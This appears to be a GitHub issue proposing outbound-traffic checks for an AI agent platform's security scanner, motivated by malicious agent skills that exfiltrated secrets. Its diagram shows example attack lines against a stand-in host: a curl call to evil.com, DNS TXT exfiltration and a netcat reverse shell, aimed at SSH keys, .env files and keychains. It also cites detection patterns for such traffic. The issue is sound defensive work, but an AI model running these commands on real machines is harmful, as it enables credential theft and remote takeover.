Add network egress policy scanner (CHK-NET-009..011) #8
Description
Summary
The forensic analysis documents multiple attacks that rely on silent outbound network connections from skills and agents -- including the "What Would Elon Do?" skill that exfiltrated data to an external server, and the Moltbook skill that encoded stolen SSH keys in DNS queries.
Currently, scan_network.sh focuses entirely on inbound exposure (listening ports, firewall status). It has zero checks for outbound/egress policy.
The Exfiltration Problem
┌─────────────────────────────────────────────────────────────┐
│ Host Machine │
│ │
│ ┌──────────┐ ┌──────────┐ ┌──────────────────────┐ │
│ │ OpenClaw │ │ Malicious│ │ No egress policy! │ │
│ │ Gateway │───▶│ Skill │───▶│ │ │
│ └──────────┘ └────┬─────┘ │ curl evil.com/steal │──┼──▶ Attacker C2
│ │ │ dns TXT exfil.xyz │──┼──▶ DNS exfil
│ │ │ nc 1.2.3.4 4444 │──┼──▶ Reverse shell
│ ▼ └──────────────────────┘ │
│ ~/.ssh/id_rsa │
│ ~/.openclaw/.env │
│ ~/Library/Keychains │
└─────────────────────────────────────────────────────────────┘
Proposed Checks
CHK-NET-009: No outbound egress restriction configured (WARN)
Check whether any egress filtering is in place:
macOS:
# Check pf (packet filter) for outbound rules
pfctl -sr 2>/dev/null | grep -E "block.*out|pass.*out.*to"
# Check Little Snitch or Lulu (common macOS outbound firewalls)
ls /Library/Extensions/LittleSnitch* 2>/dev/null
ls /Applications/LuLu.app 2>/dev/nullLinux:
# iptables OUTPUT chain
iptables -L OUTPUT -n 2>/dev/null | grep -v "^Chain\|^target\|^$"
# nftables output chain
nft list chain inet filter output 2>/dev/null
# Docker network policies
docker network inspect bridge 2>/dev/null | jq '.[0].Options'Finding example:
{
"id": "CHK-NET-009",
"severity": "warn",
"title": "No outbound network egress restrictions detected",
"description": "No firewall rules restricting outbound connections were found. Skills and agents can make arbitrary network connections to any destination, enabling silent data exfiltration.",
"evidence": "pf: no outbound rules, iptables OUTPUT: ACCEPT (default), no Little Snitch/LuLu detected",
"remediation": "Configure outbound egress rules. On macOS, install LuLu (free) or Little Snitch. On Linux, add iptables OUTPUT rules to restrict skill network access."
}CHK-NET-010: Skills sandbox allows unrestricted DNS (WARN)
DNS-based exfiltration is used by sophisticated malware (documented in the Moltbook breach). Check if DNS resolution is unrestricted:
# Check openclaw.json for sandbox.dnsPolicy
cfg '.sandbox.dnsPolicy' # should be "restricted" or contain an allowlistCHK-NET-011: OpenClaw config allows unrestricted outbound from skills (CRITICAL)
Check openclaw.json for skill network policies:
# Check if skills have network restrictions
cfg '.skills.networkPolicy' # should be "deny" or "allowlist"
cfg '.skills.allowedDomains' # should be a non-empty array
cfg '.sandbox.networkAccess' # should be "restricted"When skills.networkPolicy is missing or "allow" and no allowedDomains list exists:
{
"id": "CHK-NET-011",
"severity": "critical",
"title": "Skills have unrestricted outbound network access",
"description": "No network policy restricts outbound connections from skills. A malicious skill can exfiltrate data to any external server without detection.",
"evidence": "skills.networkPolicy=<not set>, skills.allowedDomains=<not set>, sandbox.networkAccess=<not set>",
"remediation": "Set skills.networkPolicy to 'deny' or 'allowlist' and specify skills.allowedDomains with only required endpoints.",
"auto_fix": "jq '.skills.networkPolicy = \"deny\"' config.json > config.json.tmp && mv config.json.tmp config.json"
}Implementation Notes
- Extend
scripts/scan_network.shwith three new functions - Reuse existing
check_firewall_active()output to avoid duplicate work - The egress checks complement the existing inbound checks
References
- Forensic analysis: "Silent curl exfiltration", "DNS-based data exfiltration" in Moltbook
- Cisco Skill Scanner: "What Would Elon Do?" skill silent network calls
malicious-patterns.jsonPAT-014:dns.resolve.*TXT|dgram.*sendmalicious-patterns.jsonPAT-015:require('https').get(- OWASP ASI02: Tool Misuse